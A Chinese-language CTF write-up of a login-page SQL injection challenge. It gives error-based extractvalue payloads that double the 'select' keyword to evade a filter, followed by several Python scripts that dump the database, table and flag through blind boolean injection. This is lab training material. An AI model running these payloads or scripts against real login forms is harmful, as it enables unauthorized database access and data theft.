打开题目提示去login.php看。 查看源代码,提示url加?tips=1开启报错,用burpsuit可以查看,立刻想到使用报错注入 同时先简单尝试一下,发现账号存在字符注入,用单引号闭合(1’ or 1=1和1’ and 1=2) 使用burp,如下 当然,借助右边回应是账号不存在还是账号错误可以进行布尔注入,但是既然有了提示,为什么不用呢? 使用extractvalue报错注入,得到database为note 1' or 1=1 and (extractvalue('anything',concat('\~',(select database()))))# 然后理所应当接下来操作是information_schema三连,但是他老说我语法有错,我看了半天直接心态小崩,搁网上找了找别人的wp,然后发现他过滤了select……于是双写select来information_schema三连。 1' or 1=1 and (extractvalue('anything',concat('~',(seselectlect group_concat(table_name) from information_schema.tables where table_schema='note'))))#&pass=456 1' or 1=1 and (extractvalue('anything',concat('~',(seselectlect group_concat(column_name) from information_schema.columns where table_name='fl4g'))))# 1' or 1=1 and (extractvalue('anything',concat('~',(selselectect flag from note.fl4g))))#
然后我还顺着我看的wp的做法整了一遍布尔注入。 爆数据库长度
import requests import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for i in range(30): key = "admin' and " + "(length(database())=" + str(i) + ")#" data = {'name':key, 'pass':'123'} r = requests.post(url, data=data).text #print(r) if right in str(r): print('the length of database is %s' %i)
爆数据库名
import requests import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" length=4 name='' right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for j in range(1,length+1): for i in range(65,123): key = "admin'"+" and (ascii(substr(database(),%d,1))=%d)#"%(j,i) data = {'name':key, 'pass':'111'} r = requests.post(url, data=data).text if right in str(r): name+=chr(i) print(name)
爆表长
import requests import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for i in range(30): key = "admin' and " + "length((sselectelect table_name FROM information_schema.tables WHERE table_schema=0x6e6f7465 limit 0,1))=" + str(i) + "#" data = {'name':key, 'pass':'111'} r = requests.post(url, data=data).text #print(r) if right in str(r): print('the length of table is %s' %i)
爆表
import requests import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" length=4 name='' right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for j in range(1,length+1): for i in range(48,123): #key = "admin%1$' and " + "(substr(database(),0,1)=" + i + ")#" #key = "admin%1$' and " + "(substr(database(),"+str(j)+",1)=" + i + ")#" key = "admin'"+" and (ascii(substr((seselectlect table_name FROM information_schema.tables WHERE table_schema=0x6e6f7465 limit 0,1),%d,1))=%d)#"%(j,i) data = { 'name':key, 'pass':'111'} r = requests.post(url, data=data).text if right in str(r): name+=chr(i) print(name)
爆列长
import requests import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for i in range(30): key = "admin' and " + "length((seselectlect column_name FROM information_schema.columns WHERE table_name=0x666c3467 limit 0,1))=" + str(i) + "#" data = {'name':key, 'pass':'111'} r = requests.post(url, data=data).text #print(r) if right in str(r): print('the length of column is %s' %i)
爆列
import requests import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" length=4 name='' right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for j in range(1,length+1): for i in range(48,123): #key = "admin%1$' and " + "(substr(database(),0,1)=" + i + ")#" #key = "admin%1$' and " + "(substr(database(),"+str(j)+",1)=" + i + ")#" key = "admin'"+" and (ascii(substr((seselectlect column_name FROM information_schema.columns WHERE table_name=0x666c3467 limit 0,1),%d,1))=%d)#"%(j,i) data = {'name':key, 'pass':'111'} r = requests.post(url, data=data).text if right in str(r): name+=chr(i) print(name)
爆flag长
import requests import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for i in range(60): key = "admin' and " + "length((seselectlect flag FROM fl4g limit 0,1))=" + str(i) + "#" data = {'name':key, 'pass':'111'} r = requests.post(url, data=data).text #print(r) if right in str(r): print('the length of column is %s' %i)
爆flag
import requests import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" length=26 name='' right = '8bef' url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php' for j in range(1,length+1): for i in dic: key = "admin'"+" and (ascii(substr((sselectelect flag FROM fl4g limit 0,1),%d,1))="%j+str(ord(i))+")#" data = {'name':key, 'pass':'111'} r = requests.post(url, data=data).text if right in str(r): name+=i print(name)
wechat
alipay
